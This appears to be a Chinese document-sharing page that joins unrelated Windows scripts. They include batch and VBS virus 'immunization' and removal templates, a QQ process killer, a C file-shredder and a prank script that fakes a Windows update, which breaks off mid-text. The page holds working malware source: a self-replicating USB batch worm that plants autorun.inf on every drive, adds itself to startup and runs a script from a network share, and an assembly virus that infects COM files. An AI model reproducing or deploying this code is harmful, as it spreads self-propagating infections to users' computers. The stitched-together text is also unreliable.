md c:\windows\system32\3CEBCAF.exe 2>nul
md c:\windows\system32\racvsvc.exe 2>nul
md c:\windows\nvdispdrv.exe 2>nul
md c:\windows\dbghlp32.exe 2>nul
md c:\windows\system32\drivers\svchost.exe 2>nul
md c:\windows\system32\a.exe 2>nul
md c:\windows\upxdnd.exe 2>nul
md c:\windows\WinForm.exe 2>nul
md c:\windows\system32\rsjzbpm.dll 2>nul
md c:\windows\system32\cmdbcs.dll 2>nul
md c:\windows\system32\upxdnd.dll 2>nul
md c:\windows\system32\yfmtdiouaf.dll 2>nul
md c:\windows\nvdispdrv.exe 2>nul
md c:\windows\49400MM.DLL 2>nul
md c:\windows\338448WO.dll 2>nul
md c:\windows\235780MM.dll 2>nul
md c:\windows\235780WO.DLL 2>nul
attrib c:\windows\IGW.exe +s +r +h +a 2>nul
attrib c:\windows\AVPSrv.exe +s +r +h +a 2>nul
attrib c:\windows\DiskMan32.exe +s +r +h +a 2>nul
attrib c:\windows\IGM.exe +s +r +h +a 2>nul
attrib c:\windows\Kvsc3.exe +s +r +h +a 2>nul
attrib c:\windows\lqvytv.exe +s +r +h +a 2>nul
attrib c:\windows\MsIMMs32.exe +s +r +h +a 2>nul
attrib c:\windows\system32\3CEBCAF.exe +s +r +h +a 2>nul
attrib c:\windows\system32\racvsvc.exe +s +r +h +a 2>nul
attrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nul
attrib c:\windows\dbghlp32.exe +s +r +h +a 2>nul
attrib c:\windows\system32\drivers\svchost.exe +s +r +h +a 2>nul
attrib c:\windows\system32\a.exe +s +r +h +a 2>nul
attrib c:\windows\upxdnd.exe +s +r +h +a 2>nul
attrib c:\windows\WinForm.exe +s +r +h +a 2>nul
attrib c:\

windows\system32\rsjzbpm.dll +s +r +h +a 2>nul
attrib c:\windows\system32\cmdbcs.dll +s +r +h +a 2>nul
attrib c:\windows\system32\upxdnd.dll +s +r +h +a 2>nul
attrib c:\windows\system32\yfmtdiouaf.dll +s +r +h +a 2>nul
attrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nul
attrib c:\windows\49400MM.DLL +s +r +h +a 2>nul
attrib c:\windows\338448WO.dll +s +r +h +a 2>nul
attrib c:\windows\235780WO.DLL +s +r +h +a 2>nul
attrib c:\windows\235780MM.dll +s +r +h +a 2>nul
echo y|cacls c:\windows\235780MM.dll /d everyone 2>nul
echo y|cacls c:\windows\235780WO.DLL /d everyone 2>nul
echo y|cacls c:\windows\338448WO.dll /d everyone 2>nul
echo y|cacls c:\windows\49400MM.DLL /d everyone 2>nul
echo y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\yfmtdiouaf.dll /d everyone 2>nul
echo y|cacls c:\windows\system32\upxdnd.dll /d everyone 2>nul
echo y|cacls c:\windows\WinForm.exe /d everyone
echo y|cacls c:\windows\system32\cmdbcs.dll /d everyone 2>nul
echo y|cacls c:\windows\system32\rsjzbpm.dll /d everyone 2>nul
echo y|cacls c:\windows\upxdnd.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\a.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\drivers\svchost.exe /d everyone 2>nul
echo y|cacls c:\windows\dbghlp32.exe /d everyone 2>nul
echo y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\racvsvc.exe /d everyone 2>nul
echo y|cacls c:\windows\system32\3CEBCAF.exe /d everyone 2>nul
echo y|cacls c:\windows\lqvytv.exe /d everyone 2>nul
echo y|cacls c:\windows\MsIMMs32.exe /d everyone 2>nul
echo y|cacls c:\windows\Kvsc3.exe /d everyone 2>nul
echo y|cacls c:\windows\IGM.exe /d everyone 2>nul
echo y|cacls c:\windows\DiskMan32.exe /d everyone 2>nul
echo y|cacls c:\windows\AVPSrv.exe /d everyone 2>nul
echo y|cacls c:\windows\IGW.exe /d everyone 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *********************************************************************************
echo * *
echo * 现在进行AV免疫 *
echo * *
echo *********************************************************************************
for %%x in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%x:\hfhludy.exe >nul 2>nul
for %%y in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%y:\hfhludy.exe\1..\ >nul 2>nul
for %%r in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s

,t,u,v,w,x,y,z) do attrib %%r:\hfhludy.exe +s +h +r +a >nul 2>nul
for %%u in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo y|cacls %%u:\hfhludy.exe /d everyone >nul 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *********************************************************************************
echo * *
echo * 现在进行病毒下载器免疫 *
echo * *
echo *********************************************************************************
md c:\windows\system32\conime.exe.tmp2 2>nul
attrib c:\windows\system32\conime.exe.tmp2 +s +h +r +a 2>nul
echo y|cacls c:\windows\system32\conime.exe.tmp2 /d everyone 2>nul
echo *********************************************************************************
echo * *
echo * 免疫完成 *
echo * *
echo *********************************************************************************
echo *********************************************************************************
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo * *
echo *

*
echo *********************************************************************************
pause
禁止QQ上网的vbs脚本代码
dim bag,pipe,honker,good
do
good="."
set bag=getobject("winmgmts:\\"&good&"\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='QQ.exe'")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop
病毒专杀VBS模块
“病毒专杀VBS模块.vbs”这个文件你可以直接执行,不会有任何破坏^^。
提供专杀模板,你就可以根据你分析出的病毒行为写出自己的病毒专杀工具。
非常的方便,非常的高效!
作为一个反病毒人士不应该仅仅能分析好病毒日志,还要知道如何分析病毒行为!
进而给出自己的解决方案!
这个解决方案并不一定非得用到网上那些出名的小软件icesword之类的。
因为你也可以自己写专杀,只要你学过VBS就行!
VBS代码很简单,和VB、VBSCRIPT是如出一辙的……
自然bat批处理(DOS命令)也可以写专杀,只要是编程语言大多数都是可以方便地写出专杀的。
呵~~这次你所要了解的就是如何用VBS来写专杀,我已经给出模板了,不了解的而你又真的有兴趣了解,可以到我的博客https://www.wendangku.net/doc/382620353.html,/ycosxhack来和我交流。

祝你好运:)。写专杀绝对是很快乐的事哦,因为你的专杀可以帮助很多朋友。
最后感谢好友小G(https://www.wendangku.net/doc/382620353.html,/greysign)与UMU(https://www.wendangku.net/doc/382620353.html,/umu618)
复制代码 代码如下:
'查看更多关于此病毒专杀模板信息:https://www.wendangku.net/doc/382620353.html,/ycosxhack/modify/blog/36569f51dbd0cc8e8c5430d8
'-----------------病毒专杀VBS模板源码开始-----------------
on error resume next
msgbox "本专杀有ycosxhack提供https://www.wendangku.net/doc/382620353.html,/ycosxhack!",64,"xxx病毒专杀"
'本专杀模板有ycosxhack(余弦函数)制作,我的博客:https://www.wendangku.net/doc/382620353.html,/ycosxhack,欢迎讨论。
'-----------------病毒进程结束模块开始-----------------
set w=getobject("winmgmts:")
set p=w.execquery("select * from win32_process where name='rundll.exe'")
for each i in p
i.terminate
next
'-----------------病毒进程结束模块终止-----------------
'-----------------插入型dll病毒释放模块开始-----------------
set WSHShell=wscript.createobject("wscript.shell")
WSHShell.run("ps /e * hook.dll"),0,true
'请将第三方程序ps.exe与本专杀放在同一目录下
'-----------------插入型dll病毒释放模块终止-----------------
'-----------------病毒文件删除模块开始-----------------
set fso=createobject("scripting.filesystemobject")
set del=wscript.createobject("wscript.shell")
d1=del.ExpandEnvironmentStrings("%temp%\rundll.exe")
d2=del.ExpandEnvironmentStrings("%SystemRoot%\rundll86.exe")
d3=del.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll

86.exe")
set v1=fso.getfile(d1)
set v2=fso.getfile(d2)
set v3=fso.getfile(d3)
set v4=fso.getfile("d:\virus\virus.exe") '没涉及到环境变量的可以直接这样写。
v1.attributes=0
v2.attributes=0
v3.attributes=0
v4.attributes=0
v1.delete
v2.delete
v3.delete
v4.delete
'-----------------病毒文件删除模块终止-----------------
'-----------------遍历删除各盘符根目录下病毒文件模块开始-----------------
set fso=createobject("scripting.filesystemobject")
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
set w=fso.getfile(drv.driveletter&":\rundll.exe")
w.attributes=0
w.delete
set u=fso.getfile(drv.driveletter&":\autorun.inf")
u.attributes=0
u.delete
end if
next
'-----------------遍历删除各盘符根目录下病毒文件模块终止-----------------
'-----------------注册表操作模块开始-----------------
set reg=wscript.createobject("wscript.shell")
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", fso.GetSpecialFolder(1)&"\userinit.exe,","REG_SZ"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
reg.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
'-----------------注册表操作模块终止-----------------
'-----------------系统文件恢复模块开始-----------------
set fso=createobject("scripting.filesystemobject")
fso.getfile("rundll32.exe").copy("c:\windows\system32\rundll32.exe")
fso.getfile("rundll32.exe").copy("C:\WINDOWS\system32\dllcache\rundll32.exe")
'-----------------系统文件修复模块终止-----------------
'-----------------HOST文件修复模块开始-----------------
set fso=createobject("scripting.filesystemobject")
set re=fso.OpenTextFile("C:\WINDOWS\system32\drivers\etc\hosts",2,0)
re.Writeline "127.0.0.1 localhost"
re.Writeline "127.0.0.1 www.你要屏蔽的恶意网址或https://www.wendangku.net/doc/382620353.html,"
re.Close
set re=nothing
'-----------------HOST文件修复模块终止-----------------
'-----------------Autorun免疫模块开始-----------------
set fso=createobject("scripting.filesystemobject")
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
fso.createfolder(drv.driveletter&":\autorun.inf")
fso.createfolder(drv.driveletter&":\autorun.inf\免疫文件夹..\")
set fl=fso.getfolder(drv.driveletter&":\autorun.inf")
fl.attributes=3
end if
next
'-----------------Autorun免疫模块终止-----------------
'-----------------ARP病毒欺骗--客户端免疫模块开始-----------------
set WshShell=wscript.createobject("wscript.shell")
WshShell.run "arp -d",0
WshShell.run "arp -s 202.4.139.1 00-07-ec-23-f8-0a",0,true
'-----------------ARP病毒欺骗--客户

端免疫模块终止-----------------
set fso=nothing
msgbox "病毒清除成功,请重启电脑!",64,"xxx病毒专杀"
'-----------------病毒专杀VBS模板源码终止-----------------

每次去机房用U盘总是染毒,今天把病毒代码抓出来了。

大家把下面代码复制到记事本上,无论存为txt还是bat。双击打开时,卡巴斯基和金山毒霸都会报毒。瑞星则不会。(瑞星对这方面病毒比较垃圾)。下面是毒的源代码。供大家学习和研究。
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到这个,请不要慌张。电脑病毒的定

义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@https://www.wendangku.net/doc/382620353.html,
goto :eof
:vbe
echo.wscript.createobject("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"
[转载]彻底删除文件工具代码

应该是不可恢复的,因为我是在删除前改写文件内容,最多恢复的也是改写后的内容。标准的做法应该是去系统文件表查询文件的每块具体位置,然后在这些位置上写入垃圾数据。不过太麻烦了,所以找了下面这个折衷的办法。或许有人会说,那我还不如自己动手,先改内容,再保存,再删除。是啊,我的这个程序还真没什么用场。。。。



# include "windows.h"

# include "stdio.h"



#pragma comment(lib, "kernel32.lib")



// Global Variables Declaration

char *pFileName = NULL;

HANDLE hFileDel;



// ERROR Handle Function

void ErrorExit(LPTSTR lpszFunction)

{


TCHAR szBuf[80];

LPVOID lpMsgBuf;

DWORD dw = GetLastError();



FormatMessage(

FORMAT_MESSAGE_ALLOCATE_BUFFER |

FORMAT_MESSAGE_FROM_SYSTEM,

NULL,

dw,

MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),

(LPTSTR) &lpMsgBuf,

0, NULL );



wsprintf(szBuf,

"%s failed with error %d: %s",

lpszFunction, dw, lpMsgBuf);



MessageBox(NULL, szBuf, "Error", MB_OK);



LocalFree(lpMsgBuf);

ExitProcess(dw);

}



// Main Function

int main(int argc, char *argv[])

{

if(argc != 2)

{

printf("Command Format: %s filename\n", argv[0]);

return -1;

}



pFileName = argv[1]; // the file to be deleted



// TODO: Open the Target File

hFileDel = CreateFile( pFileName,

GENERIC_READ | GENERIC_WRITE,

0,

NULL,

OPEN_EXISTING,

FILE_ATTRIBUTE_NORMAL,

NULL);

if(hFileDel == INVALID_HANDLE_VALUE) // file can not be opened

{

ErrorExit("CreatFile");

return -1;

}



LPSTR RubbishBuffer;

DWORD dwBytesWritten;

DWORD dwBufferLength;



// TODO: Get File Size

dwBufferLength = GetFileSize(hFileDel, NULL);



// TODO: Construct the Rubbish Buffer

int BufferSize = (int) dwBufferLength;

int i; // loop counter

char RubbishData[BufferSize], *p;

p = RubbishData;

for(i=0; i
{

*p = 'i';

p++;

}

//printf("the rubbish buffer is: %s\n", RubbishData);



// TODO: Overwrite the Original File with Rubbish Data

if(!WriteFile( hFileDel,

RubbishData,

dwBufferLength,

&dwBytesWritten,

NULL) )

{

ErrorExit("WriteFile Function");

return -1;

}



CloseHandle(hFileDel);



// TODO: Delete the Modified File

if(!DeleteFile(pFileName))

{

ErrorExit("DeleteFile");

return -1;

}



return 1;
间单的病毒代码

;-----------------------------------------
;功能:感染当前文件夹的https://www.wendangku.net/doc/382620353.html,文件
; 并删除当前文件夹的del.txt文件
; 显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XO

R DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "https://www.wendangku.net/doc/382620353.html,",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性,所以COM文件病毒是最简单最简单的病毒。}

vbs整人代码(要可以用) 我直接COPY到记事本里,所以别打错了。


---------------------------------------------------------------------
代码:
Set ws=WScript.CreateObject("WScript.Shell")
ws.popup"大家好,我就是改变社会风气,风魔万千少女,刺激电影市道,提高年轻人内涵,",10,"闪亮登场",64
ws.popup"玉树临风,风度翩翩的……“咕噜…咕噜…”,不好意思,我内急先闪了,再见!",15,"farewell",64
wscript.sleep 100000
ws.popup"发现重要windows更新未安装,系统将自动下载更新并安装",10
ws.popup"正在下载windows更新……",12
wscript.sleep 10000
ws.popup"windows更新已下载完毕,正在安装更新……",12
wscript.sleep 3000
msgbox"系统检测到WINDOWS更新中携带有不明软件 comcontroler.exe ,并在强行嵌入你的电脑",4132,"是否对其进行扫描?"
msgbox"软件名:comcontroler.exe "&vbcrlf&""&vbcrlf&" 大小:1.21MB "&vbcrlf&""&vbcrlf&" 发行者:幻想丶永恒(403746401)"&vbcrlf&""&vbcrlf&" 安全状况:有病毒",vbinformation
msgbox"comcontroler.exe存在不安全因素",4132,"是否阻止其安装"
msgbox"阻止失败,请检查防火墙是否开启"
wscript.sleep 15000
ws.popup"windows更新安装成功!",vbinfmation,20
msgbox"您的电脑可能已被入侵,请尽快修改您的QQ密码及其他机密资料,以免QQ被盗或丢失资料",vbinformation
ws.popup"哈哈,我已经控制了你的电脑!",12,"很高兴见到你",64
ws.popup"不信?我用你的电脑打开我的QQ空间给你看看",10
ws.run"https://www.wendangku.net/doc/382620353.html,/1021435988/infocenter"
msgbox"警告:为了您的电脑安全,请尽快安

相关文档